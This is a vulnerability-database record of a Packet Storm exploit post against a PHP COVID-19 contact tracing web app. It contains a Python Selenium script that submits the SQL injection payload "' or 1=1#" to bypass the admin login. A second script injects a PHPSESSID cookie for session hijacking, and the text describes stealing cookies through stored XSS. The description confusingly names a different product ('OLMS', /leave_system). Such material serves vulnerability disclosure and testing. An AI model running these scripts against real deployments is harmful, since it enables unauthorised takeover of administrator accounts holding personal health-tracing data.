{"id": "PACKETSTORM:164005", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "COVID-19 Contact Tracing System With QR Code Scanning 1.0 SQL Injection", "description": "", "published": "2021-09-01T00:00:00", "modified": "2021-09-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/164005/COVID-19-Contact-Tracing-System-With-QR-Code-Scanning-1.0-SQL-Injection.html", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-01T15:59:42", "viewCount": 184, "enchantments": {"dependencies": {}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "_state": {"dependencies": 1678920471, "score": 1684008354, "epss": 1679109163}, "_internal": {"score_hash": "c4b08c94ef47b387163ea65cff5202bf"}, "sourceHref": "https://packetstormsecurity.com/files/download/164005/ctsqr10-sql.txt", "sourceData": "`### Exploit Title: Covid-19 Contact Tracing System Web App with QR Code Scanning CTS-QR (by: oretnom23 ) v1.0 remote SQL-Injection-Bypass-Authentication in /cts_qr/classes/Login.php + XSS-Stored PWNED PHPSESSID Vulnerable parameter \"code\" in applicatoin State/Province List. \n### Author: nu11secur1ty \n### Testing and Debugging: nu11secur1ty \n### Date: 09.01.2021 \n### Vendor: https://www.sourcecodester.com/user/257130/activity \n### Link: \nhttps://www.sourcecodester.com/php/14728/covid-19-contact-tracing-system-web-app-qr-code-scanning-using-php-source-code.html \n### CVE: CVE-nu11-04 \n \n[+] Exploit Source: \n \n#!/usr/bin/python3 \n# Author: @nu11secur1ty \n# Debug and Developement: @nu11secur1ty \n# CVE-nu11-04 \n \nfrom selenium import webdriver \nimport time \n \n \n#enter the link to the website you want to automate login. \nwebsite_link=\"http://localhost/cts_qr/admin/login.php\" \n \n#enter your login username \nusername=\"nu11secur1ty' or 1=1#\" \n \n#enter your login password \npassword=\"nu11secur1ty' or 1=1#\" \n \n#enter the element for username input field \nelement_for_username=\"username\" \n#enter the element for password input field \nelement_for_password=\"password\" \n \nbrowser = webdriver.Chrome() \nbrowser.get((website_link)) \n \ntry: \nusername_element = browser.find_element_by_name(element_for_username) \nusername_element.send_keys(username) \npassword_element = browser.find_element_by_name(element_for_password) \npassword_element.send_keys(password) \nbrowser.maximize_window() \ntime.sleep(1) \nbrowser.execute_script(\"document.querySelector('[class=\\\"btn btn-primary \nbtn-block\\\"]').click()\") \n \nprint(\"The payload for CVE-nu11-04 is deployed...\\n\") \n \nexcept Exception: \n#### This exception occurs if the element are not found in the webpage. \nprint(\"Some error occured :(\") \n \n \n[+] PWNED PHPSESSID \n \n#!/usr/bin/python \n# @nu11secur1ty \nimport time \nfrom selenium import webdriver \n \ndriver = webdriver.Chrome() \n \ndriver.maximize_window() \ndriver.get(\"http://localhost/cts_qr/admin/login.php\") \ndriver.add_cookie({'name': 'PHPSESSID', 'value': \n'9flj0am7gv7cp3to8ujurvn1rs'}) \n \nprint(driver.get_cookie('PHPSESSID')) \ndriver.get(\"http://localhost/cts_qr/admin/login.php\") \n \ntime.sleep(3) \n \nprint(\"Your PHPSESSID is PWNED\") \n \n \n------------------------------------------------------------------ \n \n### Remote vulnerable link execution: \nhttp://localhost/cts_qr/admin/login.php \n \n### Description: \nThe OLMS - PHP (by: oretnom23 ) v1.0 in the application \n/leave_system/classes/Login.php from SQL-Injection-Bypass-Authentication \nm0re info: \nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication. \n \nThe parameter (username) from the login form is not protected correctly and \nthere is no security and escaping from malicious payloads. \nWhen the user will sending a malicious query or malicious payload to the \nMySQL server he can bypass the login credentials and take control of the \nadminister account. \n \n------------------------------------------------------------------ \n### Description PWNED PHPSESSID: \nWhen the malicious user takes control of the administer account, by using \nthe remote-MySQL-Injection-Authentication, \nthen he can perform an XSS Stored attack, for stealing PHPSESSID \ninformation and get another login by using another malicious software! \n- Conclusion: \nThis software must be DEPRECATED EMIDIATLY!!! \n \n \n### Reproduce: \nhttps://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-04/XSS \n### Proof: https://streamable.com/luf1bw \n### BR nu11secur1ty \n`\n"}
COVID-19 Contact Tracing System With QR Code Scanning 1.0 SQL Injection